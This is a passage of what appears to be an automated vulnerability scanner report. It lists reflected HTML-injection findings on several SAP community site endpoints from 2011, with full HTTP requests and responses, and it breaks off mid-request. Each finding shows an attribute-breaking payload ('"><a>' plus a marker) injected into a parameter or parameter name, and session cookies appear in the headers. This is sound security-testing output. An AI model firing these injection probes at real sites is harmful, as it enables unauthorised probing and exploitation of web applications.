Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUEtMTMzOUU3M0U2MTQtNTUzREU1QjlGRDc5MkNGOQ==; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; saplb_*=(J2EE3417100)3417150; PortalAlias=scn; JSESSIONID=(J2EE3417100)ID0344110250DB00531600921827091440End; SDNSTATE=442765484.14340.0000; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fthread.jspa%3fthreadID%3d2072047; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1321215223911%3B%20pe%3Dno%2520value%7C1321215223916%3B%20c3%3Dno%2520value%7C1321215223919%3B%20s_nr%3D1321213423931-Returning%7C1323805423931%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813423934%3B%20s_visit%3D1%7C1321215223936%3B%20gpv_p47%3Dno%2520value%7C1321215223940%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw==
SDN_RES_KEY: /library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4
Expires: 0
Content-Length: 39084
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:50:05 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/index?rid=/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4&overridelayout=truebe526"><a>f01ad06b3c6">
...[SNIP]...

1.149. http://www.sdn.sap.com/irj/scn/index [rid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/index

Issue detail

The value of the rid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a3c"><a>c5b6921fd61 was submitted in the rid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/index?rid=/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c432a3c"><a>c5b6921fd61&overridelayout=true HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CGkQFjAJ&url=http%3A%2F%2Fwww.sdn.sap.com%2Firj%2Fscn%2Findex%3Frid%3D%2Flibrary%2Fuuid%2F302058d8-e311-2a10-7bb8-da3fb36217c4%26overridelayout%3Dtrue&ei=2B3ATpv9N5PSiAL9tLyyAw&usg=AFQjCNE-gRJdHKGWnev9t7kIzwO9f-eyIQ
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUEtMTMzOUU3M0U2MTQtNTUzREU1QjlGRDc5MkNGOQ==; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; saplb_*=(J2EE3417100)3417150; PortalAlias=scn; JSESSIONID=(J2EE3417100)ID0344110250DB00531600921827091440End; SDNSTATE=442765484.14340.0000; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fthread.jspa%3fthreadID%3d2072047; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1321215223911%3B%20pe%3Dno%2520value%7C1321215223916%3B%20c3%3Dno%2520value%7C1321215223919%3B%20s_nr%3D1321213423931-Returning%7C1323805423931%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813423934%3B%20s_visit%3D1%7C1321215223936%3B%20gpv_p47%3Dno%2520value%7C1321215223940%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw==
Expires: 0
Content-Length: 28346
Date: Sun, 13 Nov 2011 19:49:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/index?rid=/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c432a3c"><a>c5b6921fd61&overridelayout=true">
...[SNIP]...

1.150. http://www.sdn.sap.com/irj/scn/submitcontent [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/submitcontent

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be213"><a>893894a05a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/submitcontent?be213"><a>893894a05a1=1 HTTP/1.1
Host: www.sdn.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: VisitID=QUMxMDY0MUUtMTMzOUYzNEExN0YtN0UyMzYyQzhFMzFGMDk1Nw==; saplb_*=(J2EE3417500)3417550; Unique=QUMxMDY0MUUtMTMzOUYzNEExN0UtMUVFRjVDODZCMzlBNDg2MA==; PortalAlias=scn; JSESSIONID=(J2EE3417500)ID0470980050DB00562634514529980956End; SDNSTATE=509874348.14340.0000

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUUtMTMzOUYzNEExN0UtMUVFRjVDODZCMzlBNDg2MA==
SDN_VISIT: QUMxMDY0MUUtMTMzOUYzNTAyNDAtRjI3M0E1MTZGRDYyNTRDQQ==
SDN_RES_KEY: /webcontent/uuid/8aa0e75d-0501-0010-12b3-d79d9bd33379
Expires: 0
Content-Length: 59300
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 23:17:08 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/submitcontent?be213"><a>893894a05a1=1">
...[SNIP]...

1.151. http://www.sdn.sap.com/irj/scn/weblogs [blog parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/weblogs

Issue detail

The value of the blog request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a8b3"><a>3713a2ebecb was submitted in the blog parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/weblogs?blog=/pub/wlg/270791a8b3"><a>3713a2ebecb HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/sdn
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUEtMTMzOUU3NTE3RDUtQjZGQjk0OTRGQjVDNDAxRg==; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; saplb_*=(J2EE3417100)3417150; JSESSIONID=(J2EE3417100)ID0344110250DB00531600921827091440End; SDNSTATE=442765484.14340.0000; __utmb=198376301; __utmc=198376301; __utma=198376301.1725460367.1321213479.1321213479.1321213479.1; __utmz=198376301.1321213485.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PortalAlias=sdn; shpuvid=172.16.92.241.1321213592635805; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Asdn%7C1321215518216%3B%20pe%3Dno%2520value%7C1321215518223%3B%20c3%3Dno%2520value%7C1321215518245%3B%20s_nr%3D1321213718253-Returning%7C1323805718253%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813718258%3B%20s_visit%3D1%7C1321215518261%3B%20gpv_p47%3Dno%2520value%7C1321215518268%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Asdn%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.sdn.sap.com/irj/scn/weblogs%2525253Fblog%2525253D/pub/wlg/27079%252526ot%25253DA%2526sapsuite5%253D%252526pid%25253Dscn%2525253Aglo%2525253Ascn%2525253Ahelp-portal%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www400.sdn.sap.com/irj/scn/logon%2525253Fredirect%2525253D/irj/scn/help-portal%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw==
Expires: 0
Content-Length: 27400
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:51:57 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/weblogs?blog=/pub/wlg/270791a8b3"><a>3713a2ebecb">
...[SNIP]...

1.152. http://www.sdn.sap.com/irj/scn/weblogs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/weblogs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7bf2"><a>f2495b60b2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/weblogs?blog=/pub/wlg/27079&e7bf2"><a>f2495b60b2f=1 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/sdn
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUEtMTMzOUU3NTE3RDUtQjZGQjk0OTRGQjVDNDAxRg==; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; saplb_*=(J2EE3417100)3417150; JSESSIONID=(J2EE3417100)ID0344110250DB00531600921827091440End; SDNSTATE=442765484.14340.0000; __utmb=198376301; __utmc=198376301; __utma=198376301.1725460367.1321213479.1321213479.1321213479.1; __utmz=198376301.1321213485.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PortalAlias=sdn; shpuvid=172.16.92.241.1321213592635805; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Asdn%7C1321215518216%3B%20pe%3Dno%2520value%7C1321215518223%3B%20c3%3Dno%2520value%7C1321215518245%3B%20s_nr%3D1321213718253-Returning%7C1323805718253%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813718258%3B%20s_visit%3D1%7C1321215518261%3B%20gpv_p47%3Dno%2520value%7C1321215518268%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Asdn%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.sdn.sap.com/irj/scn/weblogs%2525253Fblog%2525253D/pub/wlg/27079%252526ot%25253DA%2526sapsuite5%253D%252526pid%25253Dscn%2525253Aglo%2525253Ascn%2525253Ahelp-portal%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www400.sdn.sap.com/irj/scn/logon%2525253Fredirect%2525253D/irj/scn/help-portal%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw==
Expires: 0
Content-Length: 27435
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:52:31 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/weblogs?blog=/pub/wlg/27079&e7bf2"><a>f2495b60b2f=1">
...[SNIP]...

1.153. http://www.sdn.sap.com/irj/sdn [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/sdn

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d26d4"><a>de1ea131bfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/sdn?d26d4"><a>de1ea131bfa=1 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; saplb_*=(J2EE3417100)3417150; JSESSIONID=(J2EE3417100)ID0344110250DB00531600921827091440End; SDNSTATE=442765484.14340.0000; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fthread.jspa%3fthreadID%3d1414217; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1321215229293%3B%20pe%3Dno%2520value%7C1321215229301%3B%20c3%3Dno%2520value%7C1321215229303%3B%20s_nr%3D1321213429314-Returning%7C1323805429314%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813429317%3B%20s_visit%3D1%7C1321215229319%3B%20gpv_p47%3Dno%2520value%7C1321215229323%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; PortalAlias=scn

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUFDNzItODJGQzEyQjNERTlEMTVGNA==
SDN_RES_KEY: /webcontent/uuid/b0f7b924-98a9-2d10-f594-9b48cd5b8936
Expires: 0
Content-Length: 76859
Date: Sun, 13 Nov 2011 19:46:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: PortalAlias=sdn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/sdn?d26d4"><a>de1ea131bfa=1">
...[SNIP]...

1.154. http://www.sdn.sap.com/irj/sdn/logon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/sdn/logon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ccbf"><a>83f1a41f0f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/sdn/logon?redirect=http%3A%2F%2Fforums.sdn.sap.com%3A80%2Fmessage.jspa%3FmessageID%3D7893915&1ccbf"><a>83f1a41f0f2=1 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://forums.sdn.sap.com/message.jspa?messageID=7893915
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUEtMTMzOUU3NUFDNzItODJGQzEyQjNERTlEMTVGNA==; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; saplb_*=(J2EE3417100)3417150; JSESSIONID=(J2EE3417100)ID0344110250DB00531600921827091440End; SDNSTATE=442765484.14340.0000; mbox=check#true#1321213539|session#1321213478215-608827#1321215339; PortalAlias=scn; 